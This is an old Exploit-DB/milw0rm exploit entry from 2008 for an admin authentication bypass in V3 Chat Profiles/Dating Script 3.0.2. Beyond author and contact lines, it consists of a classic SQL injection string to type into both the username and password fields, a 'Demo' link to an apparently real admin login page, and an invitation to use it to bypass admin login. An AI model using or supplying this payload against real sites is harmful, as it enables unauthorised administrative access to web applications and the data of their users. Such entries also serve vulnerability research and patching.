V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass

EDB-ID:

7061

Author:

d3b4g

Type:

webapps

Platform:

PHP

Published:

2008-11-08

[~] V3 Chat - Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability
[~]
[~] -----------------------------------------------------------------
[~] Discovered By: d3b4g
[~]
[~] contact: bl4ckend[at]gmail[dot]com  
[~] 
[~] Risk: High

 ---------------------------------------------------------------------

Exploit: USe this information to bypass admin login

username: ' or ' 1=1

password: ' or ' 1=1
-----------------------------------------------------------------------

Demo: http://v3chat.com/v3profiles/admin/



[~]----------------------------------------------------------------------
[~] Greetz tO: All fu3k3rz

# milw0rm.com [2008-11-08]